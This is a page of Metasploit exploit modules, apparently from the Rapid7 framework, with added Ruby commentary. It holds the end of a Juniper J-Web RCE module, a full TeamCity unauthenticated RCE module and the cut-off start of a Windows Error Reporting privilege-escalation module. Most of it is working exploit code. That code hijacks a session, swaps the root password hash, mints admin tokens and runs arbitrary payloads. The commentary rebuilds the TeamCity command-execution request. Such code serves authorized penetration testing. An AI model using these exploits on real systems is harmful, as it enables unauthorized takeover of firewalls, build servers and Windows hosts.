The module then authenticates<br /> with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.<br /> },<br /> 'Author' => [<br /> 'Jacob Baines', # Analysis<br /> 'Ron Bowes', # Jail break technique + Target setup instructions<br /> 'jheysel-r7' # Msf module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/'],<br /> [ 'URL', 'https://vulncheck.com/blog/juniper-cve-2023-36845'],<br /> [ 'URL', 'https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US'],<br /> [ 'CVE', '2023-36845']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => %w[php unix],<br /> 'Privileged' => false,<br /> 'Arch' => [ARCH_PHP, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'PHP In-Memory',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'Type' => :php_memory,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'php/meterpreter/reverse_tcp',<br /> 'RPORT' => 80<br /> }<br /> },<br /> ],<br /> [<br /> 'Interactive SSH with jail break',<br /> {<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => 'unix',<br /> 'Type' => :nix_stream,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/interact',<br /> 'WfsDelay' => 30<br /> },<br /> 'Payload' => {<br /> 'Compat' => {<br /> 'PayloadType' => 'cmd_interact',<br /> 'ConnectionType' => 'find'<br /> }<br /> }<br /> }<br /> ]<br /><br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-08-17',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ CONFIG_CHANGES ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TMP_ROOT_PASSWORD', [ true, 'If target is set to "Interactive SSH with jail break", the root user\'s password will be 
temporarily changed to this password', rand_text_alphanumeric(24)]),<br /> OptPort.new('SSH_PORT', [true, 'SSH port of Junos Target', 22]),<br /> OptInt.new('SSH_TIMEOUT', [ true, 'The maximum acceptable amount of time to negotiate a SSH session', 30])<br /> ])<br /> end<br /><br /> def check<br /> non_existent_file = rand_text_alphanumeric(8..16)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'data' => "LD_PRELOAD=/tmp/#{non_existent_file}"<br /> )<br /><br /> return CheckCode::Appears('Environment variable manipulation succeeded indicating this target is vulnerable.') if res && res.body.include?("Cannot open \"/tmp/#{non_existent_file}\"")<br /><br /> CheckCode::Safe('Environment variable manipulation failed indicating this target is not vulnerable.')<br /> end<br /><br /> def send_php_exploit(phprc, file_contents)<br /> post_data = "allow_url_include=1\n"<br /> post_data << "auto_prepend_file=\"data://text/plain;base64,#{Rex::Text.encode_base64(file_contents)}\""<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path),<br /> 'method' => 'POST',<br /> 'data' => post_data,<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'vars_get' => {<br /> 'PHPRC' => phprc<br /> }<br /> )<br /> end<br /><br /> def get_php_session_id<br /> get_var_sess = "<?php print_r(scandir('/var/sess'));?>"<br /> res = send_php_exploit('/dev/fd/0', get_var_sess)<br /><br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br /><br /> php_session_id = res.body.scan(/\[\d+\] => sess_(.*)/).flatten[0]<br /><br /> fail_with(Failure::UnexpectedReply, "Failed to retrieve a PHP Session ID. 
There might not be a user logged in at the moment which would cause this to fail.\n Try setting JAIL_BREAK to false to in order to get a session as the 'nobody' user. Or try again when a there is a user authenticated to the J-Web application.") unless php_session_id<br /> print_status("Found PHPSESSID: #{php_session_id}.")<br /> php_session_id<br /> end<br /><br /> def get_csrf_token(php_session_id)<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'diagnose'),<br /> 'method' => 'GET',<br /> 'headers' =><br /> {<br /> 'Cookie' => "PHPSESSID=#{php_session_id}"<br /> },<br /> 'vars_get' => {<br /> 'm[]' => 'pinghost'<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br /><br /> csrf_token = res.get_html_document.xpath("//input[@type='hidden' and @name='csrf_token']/@value").text<br /> fail_with(Failure::UnexpectedReply, 'Unable to retrieve a csrf token') unless csrf_token<br /> print_status("Found csrf token: #{csrf_token}.")<br /> csrf_token<br /> end<br /><br /> def get_encrypted_root_password(php_session_id, csrf_token)<br /> post_data = "rs=get_cli_data&rsargs[]=getQuery&csrf_token=#{csrf_token}&key=1"<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'jsdm', 'ajax', 'cli-editor.php'),<br /> 'method' => 'POST',<br /> 'data' => post_data,<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'headers' =><br /> {<br /> 'Cookie' => "PHPSESSID=#{php_session_id}"<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br /><br /> # The body of the above request is formatted like so:<br /><br /> ## Last changed: 
2023-09-25 13:00:49 UTC<br /> # version 20200609.165031.6_builder.r1115480;<br /> # system {<br /> # host-name JUNOS;<br /> # root-authentication {<br /> # encrypted-password "$6$yMwZY.o0$WwCZgzN7FTDfhSvkum0y9ry/nu4yWOQcgW.JJz0vJapf5P6XHoCsigsz94oEKSPO5efKFP/JhhN3/FCKvB0Hp.";<br /> # }<br /> # login {<br /> # user admin {<br /> # uid 2000;<br /> # class super-user;<br /> # authentication {<br /> # encrypted-password "$6$65gs/MrK$DNpVWfIocQ.rG/ThjZXjRI/yha/lf1UImNKivq.T1K4yLW60PWFrcQakoP6mwHT9Cr3xQZZfomKSTRXWl2aWj1";<br /> # }<br /> # }<br /><br /> fail_with(Failure::UnexpectedReply, 'ssh root-login is not permitted on the device thus the module will not be able to establish a session or restore the original root password.') unless res.body.scan(/"ssh\s+\{\n\s+root-login\s+allow;"/)<br /> # Multiple passwords are displayed in the output, ensure we grab the encrypted-password that belongs to the<br /> # root-authentication configuration with the following regex:<br /> og_encrypted_root_pass = res.body.scan(/root-authentication\s+\{\n\s+encrypted-password\s+"(.+)"/).flatten[0]<br /> fail_with(Failure::UnexpectedReply, 'Unable to retrieve the encrypted root password from the response') unless og_encrypted_root_pass<br /><br /> print_status("Original encrypted root password: #{og_encrypted_root_pass}")<br /> og_encrypted_root_pass<br /> end<br /><br /> def set_root_password(php_session_id, csrf_token, password_hash)<br /> post_data = "&current-path=/system/root-authentication/&csrf_token=#{csrf_token}&key=1&JTK-FIELD-encrypted-password=#{password_hash}"<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'editor', 'edit', 'configuration', 'system', 'root-authentication'),<br /> 'method' => 'POST',<br /> 'data' => post_data,<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'headers' =><br /> {<br /> 'Cookie' => "PHPSESSID=#{php_session_id}"<br /> },<br /> 'vars_get' => {<br /> 'action' => 'commit'<br /> }<br /> )<br /><br /> 
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200<br /><br /> unless res.get_html_document.xpath("//body/div[@class='commit-status' and @id='systest-commit-status-div']").text == 'Success'<br /> fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})")<br /> end<br /> print_status("Successfully changed the root user's password")<br /> end<br /><br /> def ssh_login<br /> ssh_opts = ssh_client_defaults.merge({<br /> port: datastore['SSH_PORT'],<br /> auth_methods: ['password'],<br /> password: datastore['TMP_ROOT_PASSWORD']<br /> })<br /><br /> begin<br /> ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do<br /> Net::SSH.start(rhost, 'root', ssh_opts)<br /> end<br /> rescue Net::SSH::Exception, Timeout::Error => e<br /> # Timeout::Error is not a Net::SSH::Exception; rescue it too so a hung SSH handshake still lets the caller restore the original root hash.<br /> vprint_error("#{e.class}: #{e.message}")<br /> return nil<br /> end<br /><br /> if ssh<br /> Net::SSH::CommandStream.new(ssh)<br /> end<br /> end<br /><br /> def exploit<br /> case target['Type']<br /> when :nix_stream<br /> print_status("Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.")<br /> print_warning("This requires that a user is authenticated to the J-Web application, so that a session token can be stolen, and that 'ssh root-login' is set to 'allow' on the device")<br /> php_session_id = get_php_session_id<br /> csrf_token = get_csrf_token(php_session_id)<br /> @og_encrypted_root_pass = get_encrypted_root_password(php_session_id, csrf_token)<br /> tmp_password_hash = UnixCrypt::SHA512.build(datastore['TMP_ROOT_PASSWORD'])<br /> print_status "Temporary root password hash: #{tmp_password_hash}"<br /> set_root_password(php_session_id, csrf_token, tmp_password_hash)<br /><br /> if (ssh = ssh_login)<br /> print_good('Logged in as 
root')<br /> handler(ssh.lsock)<br /> end<br /><br /> set_root_password(php_session_id, csrf_token, @og_encrypted_root_pass)<br /><br /> when :php_memory<br /> send_php_exploit('/dev/fd/0', payload.encoded)<br /> else<br /> fail_with(Failure::BadConfig, 'Please select a valid target.')<br /> end<br /> end<br />end<br /></code></pre>
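The module above trusts two things it reads out of the J-Web configuration dump: the root-authentication hash and the `ssh { root-login allow; }` statement. The Ruby below is an added example, not part of the Metasploit module or of Juniper's software; it parses a constructed Junos configuration of the same shape (placeholder hashes, not real credentials) and shows what a truthiness-safe precondition check looks like. The point worth remembering: `String#scan` returns an Array and an empty Array is truthy in Ruby, so a guard written as `fail_with(...) unless body.scan(re)` can never fire; a boolean (`match?`) or `.empty?` is what such a guard needs.

```ruby
# Added example, not part of the Metasploit module above. Parses a Junos
# configuration dump of the shape the module reads back from J-Web and
# checks the two preconditions the jail-break path depends on.

# Constructed sample (placeholder hashes, not real credentials), laid out
# like the `show configuration` text the module's comment reproduces.
SAMPLE_CONFIG = <<~CONF
  ## Last changed: 2023-09-25 13:00:49 UTC
  version 20200609.165031.6_builder.r1115480;
  system {
      host-name JUNOS;
      root-authentication {
          encrypted-password "$6$rootsalt$ROOTHASHPLACEHOLDER";
      }
      login {
          user admin {
              uid 2000;
              class super-user;
              authentication {
                  encrypted-password "$6$adminsalt$ADMINHASHPLACEHOLDER";
              }
          }
      }
      services {
          ssh {
              root-login allow;
          }
      }
  }
CONF

# Anchor on the root-authentication block: the admin user also carries an
# encrypted-password statement, so a bare /encrypted-password "(.+)"/ could
# return the wrong hash.
ROOT_HASH_RE = /root-authentication\s*\{\s*encrypted-password\s+"([^"]+)"/

# Junos root-login modes; deny-password is listed before deny so the
# alternation does not stop at the shorter prefix.
ROOT_LOGIN_RE = /\bssh\s*\{\s*root-login\s+(deny-password|deny|allow)\s*;/

# Returns root's crypt(3) hash, or nil when the block is absent.
def root_password_hash(config)
  m = config.match(ROOT_HASH_RE)
  m && m[1]
end

# Returns "allow", "deny", "deny-password", or nil when the statement is
# not present (absent is treated as not allowed).
def ssh_root_login(config)
  m = config.match(ROOT_LOGIN_RE)
  m && m[1]
end

# True only when root SSH logins are explicitly allowed. This is a real
# boolean; the truthiness of String#scan would always pass.
def ssh_root_login_allowed?(config)
  ssh_root_login(config) == 'allow'
end

# Both preconditions together, the way an exploit's check step would use them.
def jailbreak_preconditions(config)
  hash = root_password_hash(config)
  {
    root_hash: hash,
    root_login: ssh_root_login(config),
    ok: !hash.nil? && ssh_root_login_allowed?(config)
  }
end

if __FILE__ == $PROGRAM_NAME
  p jailbreak_preconditions(SAMPLE_CONFIG)
  p jailbreak_preconditions(SAMPLE_CONFIG.sub('root-login allow;', 'root-login deny;'))
end
```

Run stand-alone it prints the precondition hash for the sample and for a copy with `root-login deny;`; only the first reports `ok: true`.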
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Retry<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'JetBrains TeamCity Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an authentication bypass vulnerability to achieve unauthenticated remote code execution<br /> against a vulnerable JetBrains TeamCity server. All versions of TeamCity prior to version 2023.05.4 are<br /> vulnerable to this issue. The vulnerability was originally discovered by SonarSource.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # MSF Exploit & Rapid7 Analysis<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-42793'],<br /> ['URL', 'https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis'],<br /> ['URL', 'https://blog.jetbrains.com/teamcity/2023/09/critical-security-issue-affecting-teamcity-on-premises-update-to-2023-05-4-now/']<br /> ],<br /> 'DisclosureDate' => '2023-09-19',<br /> 'Platform' => %w[win linux],<br /> 'Arch' => [ARCH_CMD],<br /> 'Payload' => { 'Space' => 1024 },<br /> 'Privileged' => false, # TeamCity may be installed to run as local system/root, or it may be run as a custom user account.<br /> 'Targets' => [<br /> [<br /> 'Windows',<br /> {<br /> 'Platform' => 'win'<br /> }<br /> ],<br /> [<br /> 'Linux',<br /> {<br /> 'Platform' => 'linux'<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> # By default 
TeamCity listens for HTTP requests on TCP port 8111.<br /> Opt::RPORT(8111),<br /> # The first user created during installation is an administrator account, so the ID will be 1.<br /> OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1]),<br /> # Because we modify a configuration file, we need to wait for the changes to be picked up. This option governs how long we wait.<br /> OptInt.new('TEAMCITY_CHANGE_TIMEOUT', [true, 'The timeout to wait for the changes to be applied', 30])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => '/login.html'<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> # We expect a TeamCity server to respond with either a "TeamCity-Node-Id" header value or a cookie named "TCSESSIONID".<br /> # The response's HTML body will contain a string with the release name and build version.<br /> if (res.headers.key?('TeamCity-Node-Id') || res.get_cookies.include?('TCSESSIONID')) && (res.body =~ /(\d+\.\d+\.\d+) \(build (\d+)\)/)<br /> detected = "JetBrains TeamCity #{::Regexp.last_match(1)} (build #{::Regexp.last_match(2)}) detected."<br /><br /> # The vulnerability was patched in release 2023.05.4 (build 129421) so anything before this build is vulnerable.<br /> if ::Regexp.last_match(2).to_i < 129421<br /> return CheckCode::Vulnerable(detected)<br /> end<br /><br /> return CheckCode::Safe(detected)<br /> end<br /><br /> CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> token_uri = "/app/rest/users/id:#{datastore['TEAMCITY_ADMIN_ID']}/tokens/RPC2"<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(token_uri)<br /> )<br /><br /> # A token named 'RPC2' may already exist if this system has been exploited before and previous exploitation<br /> # did not delete the token after use. 
We detect that here, delete the token (as we don't know its value) if required<br /> # and then proceed to create a new token for our use.<br /> if res && (res.code == 400) && res.body.include?('Token already exists')<br /><br /> print_status('Token already exists, deleting and generating a new one.')<br /><br /> unless delete_token(token_uri)<br /> fail_with(Failure::UnexpectedReply, 'Failed to delete the authentication token.')<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(token_uri)<br /> )<br /> end<br /><br /> unless res&.code == 200<br /> # One reason token creation may fail is if we use a user ID for a user that does not exist. We detect that here<br /> # and instruct the user to choose a new ID via the TEAMCITY_ADMIN_ID option.<br /> if res && (res.code == 404) && res.body.include?('User not found')<br /> print_warning('User not found, try setting the TEAMCITY_ADMIN_ID option to a different ID.')<br /> end<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to create an authentication token.')<br /> end<br /><br /> begin<br /> token = Nokogiri::XML(res.body).xpath('/token')&.attr('value').to_s<br /><br /> print_status("Created authentication token: #{token}")<br /><br /> print_status('Modifying internal.properties to allow process creation...')<br /><br /> unless modify_internal_properties(token, 'rest.debug.processes.enable', 'true')<br /> fail_with(Failure::UnexpectedReply, 'Failed to modify the internal.properties config file.')<br /> end<br /><br /> begin<br /> print_status('Executing payload...')<br /><br /> vars_get = {}<br /><br /> # We need to supply multiple params with the same name, so the TeamCity server (a Java Spring application) can<br /> # construct a List<String> sequence for multiple parameters. 
We can do this by enabling `compare_by_identity`<br /> # in the Ruby Hash. This relies on the two 'params' literals below being distinct String objects; under<br /> # `# frozen_string_literal: true` they would be deduplicated and the second assignment would overwrite the first.<br /> vars_get.compare_by_identity<br /><br /> case target['Platform']<br /> when 'win'<br /> vars_get['exePath'] = 'cmd.exe'<br /> vars_get['params'] = '/c'<br /> vars_get['params'] = payload.encoded<br /> when 'linux'<br /> vars_get['exePath'] = '/bin/sh'<br /> vars_get['params'] = '-c'<br /> vars_get['params'] = payload.encoded<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri('/app/rest/debug/processes'),<br /> 'uri_encode_mode' => 'hex-all', # we must encode all characters in the query param for the payload to work.<br /> 'headers' => {<br /> 'Authorization' => "Bearer #{token}",<br /> 'Content-Type' => 'text/plain'<br /> },<br /> 'vars_get' => vars_get<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Failed to execute arbitrary process.')<br /> end<br /> ensure<br /> print_status('Resetting the internal.properties settings...')<br /><br /> unless modify_internal_properties(token, 'rest.debug.processes.enable', nil)<br /> fail_with(Failure::UnexpectedReply, 'Failed to modify the internal.properties config file.')<br /> end<br /> end<br /> ensure<br /> print_status('Deleting the authentication token.')<br /><br /> unless delete_token(token_uri)<br /> fail_with(Failure::UnexpectedReply, 'Failed to delete the authentication token.')<br /> end<br /> end<br /> end<br /><br /> def delete_token(token_uri)<br /> res = send_request_cgi(<br /> 'method' => 'DELETE',<br /> 'uri' => normalize_uri(token_uri),<br /> 'headers' => {<br /> 'Connection' => 'close'<br /> }<br /> )<br /><br /> res&.code == 204<br /> end<br /><br /> def modify_internal_properties(token, key, value)<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri('/admin/dataDir.html'),<br /> 'headers' => {<br /> 'Authorization' => "Bearer #{token}"<br /> },<br /> 'vars_get' => {<br /> 'action' => 'edit',<br /> 
'fileName' => 'config/internal.properties',<br /> 'content' => value ? "#{key}=#{value}" : ''<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> # If we are using an authentication token for a non-admin user, we cannot modify the internal.properties file. The<br /> # server will return a 302 redirect if this is the case. Choose a different TEAMCITY_ADMIN_ID and try again.<br /> if res&.code == 302<br /> print_warning('This user is not an administrator, try setting the TEAMCITY_ADMIN_ID option to a different ID.')<br /> end<br /><br /> return false<br /> end<br /><br /> print_status('Waiting for configuration change to be applied...')<br /> retry_until_truthy(timeout: datastore['TEAMCITY_CHANGE_TIMEOUT']) do<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri('/admin/admin.html'),<br /> 'headers' => {<br /> 'Authorization' => "Bearer #{token}",<br /> 'Accept' => '*/*'<br /> },<br /> 'vars_get' => {<br /> 'item' => 'diagnostics',<br /> 'tab' => 'properties'<br /> }<br /> )<br /><br /> res&.code == 200 && res.body.include?(key)<br /> end<br /> end<br />end<br /></code></pre>
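Two pieces of the module above are worth seeing stand-alone: the build-number comparison behind `check`, and the query string that repeats `params` so that Spring binds a `List<String>`. The Ruby below is an added example, not code from the Metasploit module or from JetBrains; the `login.html` fragments are constructed, the `hex_all` routine is this example's re-creation of the module's `'hex-all'` encoding mode, and the URI path and parameter names are the ones the module uses. It also shows the caveat behind the module's `compare_by_identity` trick: frozen string literals are deduplicated by the interpreter, so the same two assignments would collapse into one entry in a file with `# frozen_string_literal: true`.

```ruby
# Added example, not part of the Metasploit module above: the build-number
# check and a repeated-parameter query string, in stand-alone form.

PATCHED_BUILD = 129421 # 2023.05.4, per the module's check method

# Constructed login.html fragments (not captured from a real server).
LOGIN_VULNERABLE = '<span id="footerVersion">Version 2023.05.3 (build 129390)</span>'
LOGIN_PATCHED    = '<span id="footerVersion">Version 2023.05.4 (build 129421)</span>'

# Same regex the module uses; returns { release:, build: } or nil.
def teamcity_version(body)
  m = body.match(/(\d+\.\d+\.\d+) \(build (\d+)\)/)
  m && { release: m[1], build: m[2].to_i }
end

def vulnerable_build?(body)
  v = teamcity_version(body)
  !v.nil? && v[:build] < PATCHED_BUILD
end

# Re-creation of the 'hex-all' mode: every byte percent-encoded, including
# unreserved characters, so nothing in the payload is interpreted early.
def hex_all(str)
  str.bytes.map { |b| format('%%%02X', b) }.join
end

# Repeated keys are simply repeated pairs; an Array of pairs needs no Hash trick.
def query_string(pairs)
  pairs.map { |k, v| "#{hex_all(k)}=#{hex_all(v)}" }.join('&')
end

# Builds the /app/rest/debug/processes request target for a platform and command.
def debug_process_uri(platform, command)
  pairs = case platform
          when 'win'   then [['exePath', 'cmd.exe'], ['params', '/c'], ['params', command]]
          when 'linux' then [['exePath', '/bin/sh'], ['params', '-c'], ['params', command]]
          else raise ArgumentError, "unsupported platform #{platform}"
          end
  "/app/rest/debug/processes?#{query_string(pairs)}"
end

# The module's approach: a Hash compared by object identity keeps two entries
# for two distinct String objects with equal contents.
def identity_param_hash(pairs)
  h = {}.compare_by_identity
  pairs.each { |k, v| h[k.dup] = v } # k.dup guarantees a fresh object per key
  h
end

# The caveat: frozen literals are interned, so both keys here are the same
# object and the second assignment overwrites the first.
def frozen_key_collision_size
  h = {}.compare_by_identity
  h['params'.freeze] = '/c'
  h['params'.freeze] = 'second value overwrites the first'
  h.size
end

if __FILE__ == $PROGRAM_NAME
  puts vulnerable_build?(LOGIN_VULNERABLE)
  puts debug_process_uri('linux', 'id')
  puts frozen_key_collision_size
end
```

In a real module the Array-of-pairs form is the more robust way to express repeated query keys; `compare_by_identity` works only as long as every key is a distinct, unfrozen String object.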
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::Common<br /> include Msf::Post::File<br /> include Msf::Exploit::FileDropper<br /> include Msf::Post::Windows::Priv<br /> include Msf::Exploit::EXE<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',<br /> 'Description' => %q{<br /> This module takes advantage of a bug in the way Windows error reporting opens the report<br /> parser. If you open a report, Windows uses a relative path to locate the rendering program.<br /> By creating a specific alternate directory structure, we can coerce Windows into opening an<br /> arbitrary executable as SYSTEM.<br /> If the current user is a local admin, the system will attempt impersonation and the exploit will<br /> fail.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Filip Dragović (Wh04m1001)', # PoC<br /> 'Octoberfest7', # PoC<br /> 'bwatters-r7' # msf module<br /> ],<br /> 'Platform' => ['win'],<br /> 'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],<br /> 'Targets' => [<br /> [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-07-11',<br /> 'References' => [<br /> ['CVE', '2023-36874'],<br /> ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],<br /> ['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],<br /> ['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']<br /> ],<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK ]<br /> },<br /> 'Compat' => 
{<br /> 'Meterpreter' => {<br /> 'Commands' => %w[<br /> stdapi_fs_delete_file<br /> stdapi_sys_config_getenv<br /> ]<br /> }<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('EXPLOIT_NAME',<br /> [true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),<br /> OptString.new('REPORT_DIR',<br /> [true, 'The error report directory name to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),<br /> OptString.new('SHADOW_DRIVE',<br /> [true, 'Directory to create in the home drive for the pivot (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),<br /> OptInt.new('EXECUTE_DELAY',<br /> [true, 'The number of seconds to delay between file upload and exploit launch', 3])<br /> ])<br /> end<br /><br /> # When we pass the directory value to the mkdir method, the mkdir method<br /> # passes the reference to the string containing the directory.<br /> # We do a lot of string manipulation in this module, so this is a quick<br /> # hack to make sure that despite what we do with the string after we create<br /> # the directory, it is the actual directory we created that gets sent to<br /> # the cleanup methods.<br /> def clone_mkdir(dir)<br /> mkdir(dir.clone)<br /> end<br /><br /> def upload_error_report<br /> wer_archive_dir = get_env('PROGRAMDATA')<br /> vprint_status(wer_archive_dir)<br /> wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'<br /> report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"<br /> report_filename = "#{report_dir}\\Report.wer"<br /> vprint_status("Creating #{report_dir}")<br /> clone_mkdir(report_dir)<br /> wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')<br /> vprint_status("Writing Report to #{report_filename}")<br /> write_file(report_filename, wer_report_data)<br /> end<br /><br /> def build_shadow_archive_dir(shadow_base_dir)<br /> wer_archive_dir = shadow_base_dir<br /> clone_mkdir(wer_archive_dir)<br /> wer_archive_dir 
<< '\\ProgramData\\'<br /> clone_mkdir(wer_archive_dir)<br /> wer_archive_dir << 'Microsoft\\'<br /> clone_mkdir(wer_archive_dir)<br /> wer_archive_dir << 'Windows\\'<br /> clone_mkdir(wer_archive_dir)<br /> wer_archive_dir << 'WER\\'<br /> clone_mkdir(wer_archive_dir)<br /> wer_archive_dir << 'ReportArchive\\'<br /> clone_mkdir(wer_archive_dir)<br /> report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"<br /> clone_mkdir(report_dir)<br /> return report_dir<br /> end<br /><br /> def upload_shadow_report(shadow_archive_dir)<br /> report_filename = "#{shadow_archive_dir}\\Report.wer"<br /> wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')<br /> vprint_status("Writing bad Report to #{report_filename}")<br /> write_file(report_filename, wer_report_data)<br /> end<br /><br /> def build_shadow_system32(shadow_base_dir)<br /> shadow_win32 = "#{shadow_base_dir}\\system32"<br /> vprint_status("Creating #{shadow_win32}")<br /> clone_mkdir(shadow_win32)<br /> return shadow_win32<br /> end<br /><br /> def upload_payload(shadow_win32)<br /> payload_bin = generate_payload_exe<br /> payload_filename = "#{shadow_win32}\\wermgr.exe"<br /> vprint_status("Writing payload to #{payload_filename}")<br /> write_file(payload_filename, payload_bin)<br /> end<br /><br /> def upload_execute_exploit(exploit_path, shadow_path, home_dir)<br /> vprint_status("shadow_path = #{shadow_path}")<br /> exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')<br /> write_file(exploit_path, exploit_bin)<br /> sleep datastore['EXECUTE_DELAY']<br /> vprint_status("Exploit uploaded to #{exploit_path}")<br /> cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"<br /> output = cmd_exec(cmd, nil, 30)<br /> vprint_status(output)<br /> end<br /><br /> def check<br /> # This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.<br /> version = get_version_info<br /> vprint_status("OS version: #{version}")<br /> 
